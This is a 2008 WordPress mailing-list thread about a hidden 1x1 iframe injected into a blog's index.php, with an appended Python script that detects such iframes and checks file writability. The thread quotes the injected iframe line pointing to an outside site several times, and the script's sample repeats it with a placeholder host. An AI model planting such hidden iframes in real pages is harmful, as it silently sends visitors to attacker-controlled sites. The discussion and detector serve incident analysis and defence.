[wp-hackers] Re: XSS vuln in wordpress 2.7 ?
god.dreams at gmail.com
Mon Dec 22 19:26:31 GMT 2008
Just to chime in on the fun, you're not the only one, as a quick Google
search pulls up a lot of people with similar posts.
As well, it shows the (supposed) owner is in Estonia, which oddly enough
is where I've seen a lot of failed hack attempts on my site coming from
(I think, maybe it was Algeria?)
Do you have mod_security enabled? No luck on pulling down the
offender's IP, and the site itself seems to do nothing but host a
Best of luck turning this around...
> Message: 7
> Date: Mon, 22 Dec 2008 20:39:49 +0200
> From: madalin <niladam at gmail.com>
> Subject: Re: [wp-hackers] XSS vuln in wordpress 2.7 ?
> To: wp-hackers at lists.automattic.com
> <df809b110812221039y29f116f1k5238dfb209d3f30a at mail.gmail.com>
> Content-Type: text/plain; charset=UTF-8
> Yes that's exactly what I am saying. Here is my index.php:
> <?php
> /**
>  * Front to the WordPress application. This file doesn't do anything, but loads
>  * wp-blog-header.php which does and tells WordPress to load the theme.
>  *
>  * @package WordPress
>  */
>
> /**
>  * Tells WordPress to load the WordPress theme and output it.
>  *
>  * @var bool
>  */
> define('WP_USE_THEMES', true);
>
> /** Loads the WordPress Environment and Template */
> require('./wp-blog-header.php');
> // echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
> ?>
> I've commented the line so I can keep it for future investigations.
> Our password has NOT been compromised, as the only logins are from my
> host and my friend's host. It could be an older version of a plugin
> However, I had to report this as maybe someone will encounter the same
> problem or so.
> On Mon, Dec 22, 2008 at 8:36 PM, Stephen Rider
> <wp-hackers at striderweb.com> wrote:
>> Well, wait. he said: "i found [it in] my blog's index.php (not theme's
>> Does this mean it shows up in the final rendered page, but not in the
>> theme's file? In that case, it's being added dynamically. The link is not
>> written in the theme.
>> Just trying to clarify. I'm no security guru... (IANASG)
>> On Dec 22, 2008, at 11:33 AM, Joost de Valk wrote:
>>> If the file is writable for the webserver and file access is enabled on
>>> the webserver: yes.
>>> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>>>> Wow. That's nasty, and malicious. Could a plugin do that?
>>>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>>>> For some reason I found my blog's index.php (not theme's index.php)
>>>>> with the following piece of code right before the ?>
>>>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>>>> I tried looking at the logs. No luck. The file's permissions look like
>>>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
> End of wp-hackers Digest, Vol 47, Issue 66
grand central: (614) 654-4296
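As an added defender-side check (not code from anyone in this thread), the script below looks for the kind of hidden-iframe echo reported above and evaluates Joost's point about whether the account PHP runs as can write the file; the sample index.php, its placeholder host and the uids/gids are constructed assumptions.

```python
import os
import re
import stat

# Pattern for the injection reported in the thread: a PHP echo of an iframe
# hidden by a 1x1 size or by CSS. Tempered so it never runs past the
# closing '";' of the echo statement.
HIDDEN_IFRAME = re.compile(
    r'echo\s+"<iframe\b(?:(?!";).)*?'
    r'(?:visibility:hidden|display:none|width=1\b|height=1\b)',
    re.IGNORECASE | re.DOTALL,
)

def find_hidden_iframes(php_source):
    """Return each echo statement in php_source that emits a hidden iframe."""
    hits = []
    for m in HIDDEN_IFRAME.finditer(php_source):
        end = php_source.find('";', m.start())
        hits.append(php_source[m.start():end + 2].strip() if end != -1
                    else php_source[m.start():].strip())
    return hits

def mode_writable_by(mode, uid, gid, web_uid, web_gids):
    """Can a process running as web_uid (member of web_gids) write a file
    with this owner, group and permission mode? Pure function for testing."""
    if uid == web_uid and mode & stat.S_IWUSR:
        return True
    if gid in web_gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)

def writable_by_webserver(path, web_uid, web_gids):
    """Same check against a real file, e.g. the blog's index.php."""
    st = os.stat(path)
    return mode_writable_by(stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid,
                            web_uid, web_gids)

# Constructed sample modelled on the thread's index.php; the host is a placeholder.
SAMPLE_INDEX_PHP = r'''<?php
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
echo "<iframe src=\"http://malicious.example/?click=0\" width=1
height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>'''

if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_INDEX_PHP):
        print("injected output found:", hit)
    # -rw-r--r-- madalin madalin is safe only if PHP does NOT run as madalin
    # (e.g. mod_php as www-data, uid 33); under suPHP/CGI it is writable.
    print("writable under mod_php:", mode_writable_by(0o644, 1000, 1000, 33, {33}))
    print("writable under suPHP:  ", mode_writable_by(0o644, 1000, 1000, 1000, {1000}))
```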